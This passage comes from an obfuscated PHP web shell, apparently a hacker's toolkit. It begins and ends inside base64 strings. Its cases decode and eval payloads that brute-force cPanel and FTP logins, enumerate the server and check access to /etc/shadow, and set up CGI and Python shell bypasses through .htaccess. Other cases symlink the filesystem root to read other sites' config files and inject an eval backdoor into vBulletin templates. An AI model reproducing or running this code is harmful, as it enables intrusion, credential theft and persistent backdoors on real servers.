KCQkkaS0tOwoJCSRpbmNEb25lID0gMDsKCQl3aGlsZSAoISRpbmNEb25lKSB7CQoJCQlmb3IgKCRqID0gMDsgJGogPCAkbnVtVmFsczsgJGorKykgewoJCQkJaWYgKCRBWyRpXSA9PSAkdmFsc1skal0pIHsKCQkJCQlicmVhazsKCQkJCX0KCQkJfQoJCQlpZiAoJGogPT0gKCRudW1WYWxzIC0gMSkpIHsKCQkJCSRBWyRpXSA9ICR2YWxzWzBdOwoJCQkJJGktLTsKCQkJCWlmICgkaSA8IDApIHsKCQkJCQlmb3IgKCRpID0gMDsgJGkgPCAoJG1heCArIDEpOyAkaSsrKSB7CgkJCQkJCWlmICgkQVskaV0gPT0gLTEpIHsKCQkJCQkJCWJyZWFrOwoJCQkJCQl9CgkJCQkJfQoJCQkJCSRBWyRpXSA9ICR2YWxzWzBdOwoJCQkJCSRBWyRpICsgMV0gPSAtMTsKCQkJCQkkaW5jRG9uZSA9IDE7CgkJCQkJcHJpbnQgIlN0YXJ0aW5nICIgLiAoc3RybGVuKCRjdXJyZW50VmFsKSArIDEpIC4gIiBDaGFyYWN0ZXJzIENyYWNraW5nPGJyPiI7CgkJCQl9CgkJCX0gZWxzZSB7CgkJCQkkQVskaV0gPSAkdmFsc1skaiArIDFdOwoJCQkJJGluY0RvbmUgPSAxOwoJCQl9CgkJfQoJCSRpID0gMDsKCQkkY3VycmVudFZhbCA9ICIiOwoJCXdoaWxlICgkQVskaV0gIT0gLTEpIHsKCQkJJGN1cnJlbnRWYWwgPSAkY3VycmVudFZhbCAuICRBWyRpXTsKCQkJJGkrKzsKCQl9CgkJY3BhbmVsX2NoZWNrKCR0YXJnZXQsJHB1cmV1c2VyLCRjdXJyZW50VmFsLCRjb25uZWN0X3RpbWVvdXQpOwoJCWlmICgkY3VycmVudFZhbCA9PSAkcmVhbE1heCkgewoJCQlyZXR1cm4gMDsKCQl9Cgl9Cn0KZnVuY3Rpb24gZ2V0bWljcm90aW1lKCkgewogICBsaXN0KCR1c2VjLCAkc2VjKSA9IGV4cGxvZGUoIiAiLG1pY3JvdGltZSgpKTsKICAgcmV0dXJuICgoZmxvYXQpJHVzZWMgKyAoZmxvYXQpJHNlYyk7Cn0gCgpmdW5jdGlvbiBmdHBfY2hlY2soJGhvc3QsJHVzZXIsJHBhc3MsJHRpbWVvdXQpCnsKICRjaCA9IGN1cmxfaW5pdCgpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImZ0cDovLyRob3N0Iik7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hUVFBBVVRILCBDVVJMQVVUSF9CQVNJQyk7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRlRQTElTVE9OTFksIDEpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJQV0QsICIkdXNlcjokcGFzcyIpOwogY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgJHRpbWVvdXQpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZBSUxPTkVSUk9SLCAxKTsKICRkYXRhID0gY3VybF9leGVjKCRjaCk7CiBpZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAyOCApCiB7CiBwcmludCAiWy1dRXJyb3IgOiBDb25uZWN0aW9uIFRpbWVvdXQiO2V4aXQ7CiB9CiBlbHNlIGlmICggY3VybF9lcnJubygkY2gpID09IDAgKQogewogIHByaW50ICI8YnI+WytdQnJ1dGVmb3JjZSB
eval(base64_decode($tkl));
exit;
case "Server-Info":
$tkl = "ICAkc2FmZV9zdGF0X3RrbCA9IGluaV9nZXQgKCJzYWZlX21vZGUiKTsgaWYgKCRzYWZlX3N0YXRfdGtsID09IDApICAgeyAkc2FmZV9zdGF0ID0gJ09GRic7IH0gZWxzZSB7ICRzYWZlX3N0YXQgPSAnT048YSBocmVmPSI/Z2F6YT1pbmkiPiBbQ3JlYXRlIHBocC5pbmldPC9hPic7IH0gICBpZighZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpIHsgCQkkdXNlciA9IEBnZXRfY3VycmVudF91c2VyKCk7IAkJJHVpZCA9IEBnZXRteXVpZCgpOyAJCSRnaWQgPSBAZ2V0bXlnaWQoKTsgCQkkZ3JvdXAgPSAiPyI7IAl9IGVsc2UgeyAJCSR1aWQgPSBAcG9zaXhfZ2V0cHd1aWQocG9zaXhfZ2V0ZXVpZCgpKTsgCQkkZ2lkID0gQHBvc2l4X2dldGdyZ2lkKHBvc2l4X2dldGVnaWQoKSk7IAkJJHVzZXIgPSAkdWlkWyduYW1lJ107IAkJJHVpZCA9ICR1aWRbJ3VpZCddOyAJCSRncm91cCA9ICRnaWRbJ25hbWUnXTsgCQkkZ2lkID0gJGdpZFsnZ2lkJ107IAl9IGVjaG8gJ0hvc3QgOiAnLiRfU0VSVkVSWyJIVFRQX0hPU1QiXS4nPGJyPic7IGVjaG8gJ3BocCA6ICcucGhwdmVyc2lvbigpLic8YnI+JzsgZWNobyAnc2FmZSBtb2RlIDogJy4kc2FmZV9zdGF0Lic8YnI+JzsgZWNobyAnY3dkIDogJy5nZXRjd2QoKS4nPGJyPic7CSBlY2hvICAnVW5hbWU6ICcuc3Vic3RyKEBwaHBfdW5hbWUoKSwgMCwgMTIwKS4nPGJyPicgOyBlY2hvICAnVXNlcjogJyAuICR1aWQgLiAnICggJyAuICR1c2VyIC4gJyApICcgLiAkZ2lkIC4gJyAoICcgLiAkZ3JvdXAgLiAnICk8YnI+JzsgZWNobyAnU2VydmVyIElQOiAnIC4gQCRfU0VSVkVSWyJTRVJWRVJfQUREUiJdIC4gJzxicj5DbGllbnQgSVA6ICcgLiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXS4nPGJyPistLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSs8YnI+JyA7IGZ1bmN0aW9uIHRrbF9zZWMoJG4sICR2KSB7IAkJJHYgPSB0cmltKCR2KTsgCQlpZigkdikgeyAJCQllY2hvICc8c3Bhbj4nIC4gJG4gLiAnOiA8L3NwYW4+JzsgCQkJaWYoc3RycG9zKCR2LCAiXG4iKSA9PT0gZmFsc2UpIAkJCQllY2hvICR2IC4gJzxicj48YnI+JzsgCQkJZWxzZSAJCQkJZWNobyAnPHByZSBjbGFzcz1tbDE+JyAuICR2IC4gJzwvcHJlPic7IAkJfSAJfSAJdGtsX3NlYygnU2VydmVyIHNvZnR3YXJlJywgQGdldGVudignU0VSVkVSX1NPRlRXQVJFJykpOyAgICAgaWYoZnVuY3Rpb25fZXhpc3RzKCdhcGFjaGVfZ2V0X21vZHVsZXMnKSkgICAgICAgICB0a2xfc2VjKCdMb2FkZWQgQXBhY2hlIG1vZHVsZXMnLCBpbXBsb2RlKCcsICcsIGFwYWNoZV9nZXRfbW9kdWxlcygpKSk7IAl0a2xfc2VjKCdEaXNhYmxlZCBQSFAgRnVuY3Rpb25zJywgJEdMT0JBTFNbJ2Rpc2FibGVfZnVuY3Rpb25zJ10/JEdMT0JBTFNbJ2Rpc2FibGVfZnVuY3Rpb25zJ106J25vbmUnKTsgCXRrbF9zZWMoJ09wZW4gYmFzZSBkaXInLCBAaW5pX2dldCgnb3Blbl9iYXNlZGlyJykpOyAJdGtsX3NlYygnU2FmZSBtb2RlIGV4ZWMgZGlyJywgQGluaV9nZXQoJ3NhZmVfbW9kZV9leGVjX2RpcicpKTsgCXRrbF9zZWMoJ1NhZmUgbW9kZSBpbmNsdWRlIGRpcicsIEBpbmlfZ2V0KCdzYWZlX21vZGVfaW5jbHVkZV9kaXInKSk7IAl0a2xfc2VjKCdjVVJMIHN1cHBvcnQnLCBmdW5jdGlvbl9leGlzdHMoJ2N1cmxfdmVyc2lvbicpPydlbmFibGVkJzonbm8nKTsgCSR0ZW1wPWFycmF5KCk7IAlpZihmdW5jdGlvbl9leGlzdHMoJ215c3FsX2dldF9jbGllbnRfaW5mbycpKSAJCSR0ZW1wW10gPSAiTXlTcWwgKCIubXlzcWxfZ2V0X2NsaWVudF9pbmZvKCkuIikiOyAJaWYoZnVuY3Rpb25fZXhpc3RzKCdtc3NxbF9jb25uZWN0JykpIAkJJHRlbXBbXSA9ICJNU1NRTCI7IAlpZihmdW5jdGlvbl9leGlzdHMoJ3BnX2Nvbm5lY3QnKSkgCQkkdGVtcFtdID0gIlBvc3RncmVTUUwiOyAJaWYoZnVuY3Rpb25fZXhpc3RzKCdvY2lfY29ubmVjdCcpKSAJCSR0ZW1wW10gPSAiT3JhY2xlIjsgCXRrbF9zZWMoJ1N1cHBvcnRlZCBkYXRhYmFzZXMnLCBpbXBsb2RlKCcsICcsICR0ZW1wKSk7IAllY2hvICc8YnI+JzsgCWlmKCRHTE9CQUxTWydvcyddID09ICduaXgnKSB7IAkJdGtsX3NlYygnUmVhZGFibGUgL2V0Yy9wYXNzd2QnLCBAaXNfcmVhZGFibGUoJy9ldGMvcGFzc3dkJyk/InllcyA8YSBocmVmPScjJyBvbmNsaWNrPSdnKFwiRmlsZXNUb29sc1wiLCBcIi9ldGMvXCIsIFwicGFzc3dkXCIpJz5bZ29dPC9hPiI6J25vJyk7IAkJdGtsX3NlYygnUmVhZGFibGUgL2V0Yy9zaGFkb3cnLCBAaXNfcmVhZGFibGUoJy9ldGMvc2hhZG93Jyk/InllcyA8YSBocmVmPScjJyBvbmNsaWNrPSdnKFwiRmlsZXNUb29sc1wiLCBcImV0Y1wiLCBcInNoYWRvd1wiKSc+W2dvXTwvYT4iOidubycpOyAJCXRrbF9zZWMoJ1JlYWRhYmxlIC9ldGMvc2hhZG93JywgQGlzX3JlYWRhYmxlKCcvZXRjL3NoYWRvdycpPyJ5ZXMgPGEgaHJlZj0nIycgb25jbGljaz0nZyhcIkZpbGVzVG9vbHNcIiwgXCJldGNcIiwgXCJzaGFkb3dcIiknPltnb108L2E+Ijonbm8nKTsgCQl0a2xfc2VjKCdSZWFkYWJsZSAvZXRjL3NoYWRvdycsIEBpc19yZWFkYWJsZSgnL2V0Yy9zaGFkb3cnKT8ieWVzIDxhIGhyZWY9JyMnIG9uY2xpY2s9J2coXCJGaWxlc1Rvb2xzXCIsIFwiZXRjXCIsIFwic2hhZG93XCIpJz5bZ29dPC9hPiI6J25vJyk7IAkJdGtsX3NlYygnUmVhZGFibGUgL2V0Yy9zaGFkb3cnLCBAaXNfcmVhZGFibGUoJy9ldGMvc2hhZG93Jyk/InllcyA8YSBocmVmPScjJyBvbmNsaWNrPSdnKFwiRmlsZXNUb29sc1wiLCBcImV0Y1wiLCBcInNoYWRvd1wiKSc+W2dvXTwvYT4iOidubycpOyAJCXRrbF9zZWMoJ1JlYWRhYmxlIC9ldGMvc2hhZG93JywgQGlzX3JlYWRhYmxlKCcvZXRjL3NoYWRvdycpPyJ5ZXMgPGEgaHJlZj0nIycgb25jbGljaz0nZyhcIkZpbGVzVG9vbHNcIiwgXCJldGNcIiwgXCJzaGFkb3dcIiknPltnb108L2E+Ijonbm8nKTsgCQl0a2xfc2VjKCdPUyB2ZXJzaW9uJywgQGZpbGVfZ2V0X2NvbnRlbnRzKCcvcHJvYy92ZXJzaW9uJykpOyAJCXRrbF9zZWMoJ0Rpc3RyIG5hbWUnLCBAZmlsZV9nZXRfY29udGVudHMoJy9ldGMvaXNzdWU
eval(base64_decode($tkl));
exit;
case "bypass":
$tkl = "QG1rZGlyKCdieXBhc3MnKTsKZWNobyAiPC9icj4gU2VsZWN0IGJ5cGFzcyBUb29sIDo8L2JyPgo8Zm9ybSBtZXRob2Q9J1BPU1QnID4JCQk8cD4KPHNlbGVjdCBuYW1lPSdieXBhc3NfdHlwZSc+CjxvcHRpb24gdmFsdWU9J0NnaV9TaGVsbCc+Q2dpIFNoZWxsPC9vcHRpb24+CjxvcHRpb24gdmFsdWU9J01pbmlfQ2dpJz5NaW5pIENnaTwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSdDb25maWdfU2hlbGwnPkNvbmZpZyBTaGVsbDwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSdQeXRob25fU2hlbGwnPlB5dGhvbiBTaGVsbDwvb3B0aW9uPgo8L3NlbGVjdD4KPGlucHV0IHR5cGU9J3N1Ym1pdCcgdmFsdWU9J2dvID4+JyAvPgo8L3A+PC9mb3JtPiI7CiRkb2R5X3RrbCA9ICRfUE9TVFsnYnlwYXNzX3R5cGUnXTsKc3dpdGNoICgkZG9keV90a2wpIHsKY2FzZSAiQ2dpX1NoZWxsIjoKICAgIEBta2RpcignYnlwYXNzL2NnaV9zaGVsbCcsIDA3NTUpOwogICAgY2hkaXIoJ2J5cGFzcy9jZ2lfc2hlbGwnKTsgICAgICAKICAgICAgICAkdGtsID0gIi5odGFjY2VzcyI7CiAgICAgICAgJHRrbF9ub3RlID0gIiR0a2wiOwogICAgICAgICRkb2R5ID0gZm9wZW4gKCR0a2xfbm90ZSAsICd3Jykgb3IgZGllICgiZG9keSBhJiMyMzE7JiMzMDU7bGFtYWQmIzMwNTshIik7CiAgICAgICAgJG1ldGluID0gIlQzQjBhVzl1Y3lCR2IyeHNiM2RUZVcxTWFXNXJjeUJOZFd4MGFWWnBaWGR6SUVsdVpHVjRaWE1nUlhobFkwTkhTUXBCWkdSVWVYQmxJR0Z3Y0d4cFkyRjBhVzl1TDNndGFIUjBjR1F0WTJkcElDNWphVzRLUVdSa1NHRnVaR3hsY2lCaloya3RjMk55YVhCMElDNWphVzRLUVdSa1NHRnVaR3hsY2lCaloya3RjMk55YVhCMElDNWphVzQ9IjsgICAgCiAgICAgICAgZndyaXRlICggJGRvZHkgLCBiYXNlNjRfZGVjb2RlKCRtZXRpbikgKSA7CiAgICAgICAgZmNsb3NlICgkZG9keSk7CiRjZ2lzaGVsbGl6b2NpbiA9ICdJeUV2ZFhOeUwySnBiaTl3WlhKc0lDMUpMM1Z6Y2k5c2IyTmhiQzlpWVc1a2JXRnBiZzBLSXkwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUTBLSXlBOFlpQnpkSGxzWlQwaVkyOXNiM0k2WW14aFkyczdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pabVptWmpZMklqNXdjbWwyT0NCaloya2djMmhsYkd3OEwySStJQ01nYzJWeWRtVnlEUW9qTFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHREUW9OQ2lNdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzBOQ2lNZ1EyOXVabWxuZFhKaGRHbHZiam9nV1c5MUlHNWxaV1FnZEc4Z1kyaGhibWRsSUc5dWJIa2dKRkJoYzNOM2IzSmtJR0Z1WkNBa1YybHVUbFF1SUZSb1pTQnZkR2hsY2cwS0l5QjJZV3gxWlhNZ2MyaHZkV3hrSUhkdmNtc2dabWx1WlNCbWIzSWdiVzl6ZENCemVYTjBaVzF6TGcwS0l5MHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFEwS0pGQmhjM04zYjNKa0lEMGdJbkJ5YVhZNElqc0pDU01nUTJoaGJtZGxJSFJvYVhNdUlGbHZkU0IzYVd4c0lHNWxaV1FnZEc4Z1pXNTBaWElnZEdocGN3MEtDUWtKQ1NNZ2RHOGdiRzluYVc0dURRb05DaVJYYVc1T1ZDQTlJREE3Q1FrSkl5QlpiM1VnYm1WbFpDQjBieUJqYUdGdVoyVWdkR2hsSUhaaGJIVmxJRzltSUhSb2FYTWdkRzhnTVNCcFpnMEtDUWtKQ1NNZ2VXOTFKM0psSUhKMWJtNXBibWNnZEdocGN5QnpZM0pwY0hRZ2IyNGdZU0JYYVc1a2IzZHpJRTVVRFFvSkNRa0pJeUJ0WVdOb2FXNWxMaUJKWmlCNWIzVW5jbVVnY25WdWJtbHVaeUJwZENCdmJpQlZibWw0TENCNWIzVU5DZ2tKQ1FraklHTmhiaUJzWldGMlpTQjBhR1VnZG1Gc2RXVWdZWE1nYVhRZ2FYTXVEUW9OQ2lST1ZFTnRaRk5sY0NBOUlDSW1JanNKQ1NNZ1ZHaHBjeUJqYUdGeVlXTjBaWElnYVhNZ2RYTmxaQ0IwYnlCelpYQmxjbUYwWlNBeUlHTnZiVzFoYm1SekRRb0pDUWtKSXlCcGJpQmhJR052YlcxaGJtUWdiR2x1WlNCdmJpQlhhVzVrYjNkeklFNVVMZzBLRFFva1ZXNXBlRU50WkZObGNDQTlJQ0k3SWpzSkNTTWdWR2hwY3lCamFHRnlZV04wWlhJZ2FYTWdkWE5sWkNCMGJ5QnpaWEJsY21GMFpTQXlJR052YlcxaGJtUnpEUW9KQ1FrSkl5QnBiaUJoSUdOdmJXMWhibVFnYkdsdVpTQnZiaUJWYm1sNExnMEtEUW9rUTI5dGJXRnVaRlJwYldWdmRYUkVkWEpoZEdsdmJpQTlJREV3T3draklGUnBiV1VnYVc0Z2MyVmpiMjVrY3lCaFpuUmxjaUJqYjIxdFlXNWtjeUIzYVd4c0lHSmxJR3RwYkd4bFpBMEtDUWtKQ1NNZ1JHOXVKM1FnYzJWMElIUm9hWE1nZEc4Z1lTQjJaWEo1SUd4aGNtZGxJSFpoYkhWbExpQlVhR2x6SUdsekRRb0pDUWtKSXlCMWMyVm1kV3dnWm05eUlHTnZiVzFoYm1SeklIUm9ZWFFnYldGNUlHaGhibWNnYjNJZ2RHaGhkQTBLQ1FrSkNTTWdkR0ZyWlNCMlpYSjVJR3h2Ym1jZ2RHOGdaWGhsWTNWMFpTd2diR2xyWlNBaVptbHVaQ0F2SWk0TkNna0pDUWtqSUZSb2FYTWdhWE1nZG1Gc2FXUWdiMjVzZVNCdmJpQlZibWw0SUhObGNuWmxjbk11SUVsMElHbHpEUW9KQ1FrSkl5QnBaMjV2Y21Wa0lHOXVJRTVVSUZObGNuWmxjbk11RFFvTkNpUlRhRzkzUkhsdVlXMXBZMDkxZEhCMWRDQTlJREU3Q1FraklFbG1JSFJvYVhNZ2FYTWdNU3dnZEdobGJpQmtZWFJoSUdseklITmxiblFnZEc4Z2RHaGxEUW9KQ1FrSkl5QmljbTkzYzJWeUlHRnpJSE52YjI0Z1lYTWdhWFFnYVhNZ2IzVjBjSFYwTENCdmRHaGxjbmRwYzJVTkNna0pDUWtqSUdsMElHbHpJR0oxWm1abGNtVmtJR0Z1WkNCelpXNWtJSGRvWlc0Z2RHaGxJR052YlcxaGJtUU5DZ2tKQ1FraklHTnZiWEJzWlhSbGN5NGdWR2hwY3lCcGN5QjFjMlZtZFd3Z1ptOXlJR052Ylc
eval(base64_decode($tkl));
exit;
case "symlink":
$tkl = "ICBAc2V0X3RpbWVfbGltaXQoMCk7IEBta2RpcigndGtsJywwNzc3KTsgJElJSUlJSUlJSUlsMSAgPSAiT3B0aW9ucyBhbGwgXG4gRGlyZWN0b3J5SW5kZXggZ2F6YS5odG1sIFxuIEFkZFR5cGUgdGV4dC9wbGFpbiAucGhwIFxuIEFkZEhhbmRsZXIgc2VydmVyLXBhcnNlZCAucGhwIFxuICBBZGRUeXBlIHRleHQvcGxhaW4gLmh0bWwgXG4gQWRkSGFuZGxlciB0eHQgLmh0bWwgXG4gUmVxdWlyZSBOb25lIFxuIFNhdGlzZnkgQW55IjsgJElJSUlJSUlJSUkxSSA9QGZvcGVuICgndGtsLy5odGFjY2VzcycsJ3cnKTsgZndyaXRlKCRJSUlJSUlJSUlJMUkgLCRJSUlJSUlJSUlJbDEpOyAgZWNobyAnICA8YnIgLz48YnIgLz4gPGZvcm0gbWV0aG9kPSJwb3N0Ij4gRmlsZSBQYXRoOjxiciAvPiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZSIgdmFsdWU9Ii9ob21lL2dhemFoYWNrL3B1YmxpY19odG1sL2NvbmZpZy5waHAiIHNpemU9IjYwIi8+IDxicj5TeW1saW5rIE5hbWU8YnI+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJzeW1maWxlIiB2YWx1ZT0iZ2F6YS50eHQiIHNpemU9IjYwIi8+PGJyIC8+PGJyIC8+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJzeW1saW5rIiBuYW1lPSJzeW1saW5rIiAvPiA8YnIgLz48YnIgLz4gPC9mb3JtPiAnOyAkSUlJSUlJSUkxbElsID0gJF9QT1NUWydmaWxlJ107ICRzeW1maWxlID0gJF9QT1NUWydzeW1maWxlJ107ICRzeW1saW5rID0gJF9QT1NUWydzeW1saW5rJ107IGlmICgkc3ltbGluaykgeyBAc3ltbGluaygiJElJSUlJSUlJMWxJbCIsInRrbC8kc3ltZmlsZSIpOyBlY2hvICc8YnIgLz48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0idGtsLycuJHN5bWZpbGUuJyIgPj09PT4nLiRzeW1maWxlLic8PT09PC9hPic7IH0gIEBzeW1saW5rKCcvJywndGtsL3Jvb3QnKTsgICRJSUlJSUlJSUlsbEkgPSBAZmlsZSgnL2V0Yy9uYW1lZC5jb25mJyk7IGlmKCEkSUlJSUlJSUlJbGxJKSB7IGRpZSAoIiBjYW4ndCByZWFkIC9ldGMvbmFtZWQuY29uZiIpOyB9IGVsc2UgeyAgICAgZWNobyAiPGRpdiBjbGFzcz0ndG1wJz48dGFibGUgIHdpZHRoPSc0MCUnPjx0ZD5Eb21haW5zPC90ZD48dGQ+VXNlcnMgJiBzeW1saW5rPC90ZD4iOyBmb3JlYWNoKCRJSUlJSUlJSUlsbEkgYXMgJElJSUlJSUlJSWxsMSl7IGlmKGVyZWdpKCd6b25lJywkSUlJSUlJSUlJbGwxKSl7IHByZWdfbWF0Y2hfYWxsKCcjem9uZSAiKC4qKSIjJywkSUlJSUlJSUlJbGwxLCRJSUlJSUlJSUlsMTEpOyBmbHVzaCgpOyBpZihzdHJsZW4odHJpbSgkSUlJSUlJSUlJbDExWzFdWzBdKSkgPjIpeyAkSUlJSUlJSUlJMUkxID0gcG9zaXhfZ2V0cHd1aWQoQGZpbGVvd25lcignL2V0Yy92YWxpYXNlcy8nLiRJSUlJSUlJSUlsMTFbMV1bMF0pKTsgJElJSUlJSUlJMUkxbCA9ICRJSUlJSUlJSUkxSTFbJ25hbWUnXSA7IEBzeW1saW5rKCcvJywndGtsL3Jvb3QnKTsgJElJSUlJSUlJMUkxbCA9ICRJSUlJSUlJSUlsMTFbMV1bMF07IGVjaG8gIiA8dHI+IDx0ZD4gPGRpdiBjbGFzcz0nZG9tJz48YSB0YXJnZXQ9J19ibGFuaycgaHJlZj1odHRwOi8vd3d3LiIuJElJSUlJSUlJSWwxMVsxXVswXS4iLz4iLiRJSUlJSUlJSTFJMWwuIiA8L2E+IDwvZGl2PiA8L3RkPiA8dGQ+IDxhIGhyZWY9J3RrbC9yb290L2hvbWUvIi4kSUlJSUlJSUlJMUkxWyduYW1lJ10uIi9wdWJsaWNfaHRtbCcgdGFyZ2V0PSdfYmxhbmsnPiIuJElJSUlJSUlJSTFJMVsnbmFtZSddLiI8L2E+ICA8L3RkPiA8L3RyPjwvZGl2PiAiOyBmbHVzaCgpOyB9IH0gfSB9";
eval(base64_decode($tkl));
exit;
case "vBulletin-Tool":
echo '<form method="GET">Select Tool : <br><p>
<select name="tool">
<option value="Inject">Shell Inject</option>
<option value="VBindex">Change index</option>
</select>
<input type="submit" value=">>" />
</p>
</form>';
exit;
case "Inject":
echo '
Shell Inject</b></p>';
if (empty($_POST[db])){
print '
<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = encode64(document.frm.code.value)">
<br>
Inject To :<br><select size="1" name="template">
<option value="FAQ">FAQ.PHP</option>
<option value="FORUMHOME">FORUMHOME</option>
<option value="search_forums">search forums</option>
<option value="SHOWGROUPS">SHOWGROUPS</option>
<option value="SHOWTHREAD">SHOWTHREAD.PHP</option>
<option value="CALENDAR">CALENDAR.PHP</option>
<option value="MEMBERINFO">MEMBERINFO</option>
<option value="footer">footer</option>
<option value="header">header</option>
<option value="headinclude">headinclude</option>
<option value="lostpw">lostpw</option>
<option value="memberlist">memberlist</option></select></p>
<br> Host : <br><input name="lo" type="text" value="localhost" align="LEFT" size="18">
<br>DataBase Name: <br><input name="db" type="text" align="LEFT" size="18" >
<br>User Name :<br><input name="user" type="text" align="LEFT" size="15" >
<br>Password :<br><input name="pass" type="text" align="MIDDLE" size="15" >
<br>Table Prefix :<br><input name="tab" type="text" align="LEFT" size="15" >
<br><input type="submit" value="Inject"/>';
}else{
$a ="{\${eval(base64_decode(\'";
$code ='JGNvZGUgPSAnUEQ4Z0lHbG1JQ2drWkdseUlEMDlJQ2NuS1hzZ0pHUnBjaUE5SUdkbGRHTjNaQ2dwT3lCOUlHbG1JQ2drWDFCUFUxUmJKMk52YlcxaGJtUW5YU0FoUFNBbkp5bDdJQ1JsZUdWalgzUjVjR1U5SkY5UVQxTlVXeWRsZUdWamRYUmxYM1I1Y0dVblhUc2dKR052YlQwa1gxQlBVMVJiSjJOdmJXMWhibVFuWFRzZ1pXTm9ieUFrWTI5dE95QnBaaUFvYVhOelpYUW9KR1Y0WldOZmRIbHdaU2twSUhzZ2FXWWdLQ1JsZUdWalgzUjVjR1U5UFNJeElpa2dleUJsWTJodklITm9aV3hzWDJWNFpXTW9KR052YlNrN0lIMGdaV3h6WldsbUtDUmxlR1ZqWDNSNWNHVTlQU0l5SWlrZ2V5QmxZMmh2SUhONWMzUmxiU2drWTI5dEtUc2dJSDBnWld4elpXbG1JQ2drWlhobFkxOTBlWEJsUFQwaU15SXBJSHNnY0dGemMzUm9jblVvSkdOdmJTazdJSDBnWld4elpXbG1JQ2drWlhobFkxOTBlWEJsUFQwaU5DSXBJSHNnYVdZZ0tHWjFibU4wYVc5dVgyVjRhWE4wY3loemFHVnNiRjlsZUdWaktTa2dleUJsWTJodklITm9aV3hzWDJWNFpXTW9KR052YlNrN0lIMGdaV3h6WldsbUlDaG1kVzVqZEdsdmJsOWxlR2x6ZEhNb2MzbHpkR1Z0S1NrZ2V5QmxZMmh2SUhONWMzUmxiU2drWTI5dEtUc2dmU0JsYkhObGFXWWdLR1oxYm1OMGFXOXVYMlY0YVhOMGN5aHdZWE56ZEdoeWRTa3BJSHNnWldOb2J5QndZWE56ZEdoeWRTZ2tZMjl0S1RzZ2ZTQmxiSE5sSUhzZ1pXTm9ieUFpV3kxZFNTQmpZVzRnYm05MElFVjRaV04xZEdVZ1lXNTVJR052YlcxaGJtUWlPeUI5SUNBZ0lDQjlJSDBnSUgwZ2FXWWdLQ0ZsYlhCMGVTQW9KRjlHU1V4RlUxc25aMkY2WVZWUUoxMHBLU0I3SUNBZ0lDQnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25aMkY2WVZWUUoxMWJKM1J0Y0Y5dVlXMWxKMTBzSkdScGNpNG5MeWN1SkY5R1NVeEZVMXNuWjJGNllWVlFKMTFiSjI1aGJXVW5YU2s3SUNBZ0lDQWtaMkY2WVY5MFpYaDBJRDBnSWp4aVBsVndiRzloWkdWa0lGTjFZMk5sYzNObWRXeHNlVHd2WWo0OFluSStabWxzWlNCdVlXMWxJRG9nSWk0a1gwWkpURVZUV3lkbllYcGhWVkFuWFZzbmJtRnRaU2RkTGlJOFluSStabWxzWlNCemFYcGxJRG9nSWk0a1gwWkpURVZUV3lkbllYcGhWVkFuWFZzbmMybDZaU2RkTGlJOFluSStabWxzWlNCMGVYQmxJRG9nSWk0a1gwWkpURVZUV3lkbllYcGhWVkFuWFZzbmRIbHdaU2RkTGlJOFluSStJanNnZlNCbFkyaHZKendoTFMwZ1JYaGxZM1YwWlNBdUwzUnJiQzB0UGlBSkNUeG1iM0p0SUcxbGRHaHZaRDFRVDFOVUlENEpDUWs4Y0Q0Z0NRa0pQR2x1Y0hWMElIUjVjR1U5SW5SbGVIUWlJRzVoYldVOUltTnZiVzFoYm1RaUlDOCtJQWtKQ1R4elpXeGxZM1FnYm1GdFpUMGlaWGhsWTNWMFpWOTBlWEJsSWo0Z0NRa0pDVHh2Y0hScGIyNGdkbUZzZFdVOU5ENUJkWFJ2SUZObGJHVmpkRHd2YjNCMGFXOXVQaUFKQ1FrSlBHOXdkR2x2YmlCMllXeDFaVDB4UG5Ob1pXeHNJR1Y0WldNOEwyOXdkR2x2Ymo0Z0NRa0pDVHh2Y0hScGIyNGdkbUZzZFdVOU1qNXplWE4wWlcwOEwyOXdkR2x2Ymo0Z0NRa0pDVHh2Y0hScGIyNGdkbUZzZFdVOU16NXdZWE56ZEdoeWRUd3ZiM0IwYVc5dVBpQUpDUWtKQ1FrSkNUd3ZjMlZzWldOMFBpQUpDUWs4YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpUlhobFkzVjBaU0lnTHo0Z0NTQUpDUWs4TDNBK0lBa0pQQzltYjNKdFBpQThJUzB0SUdWdVpDQkZlR1ZqZFh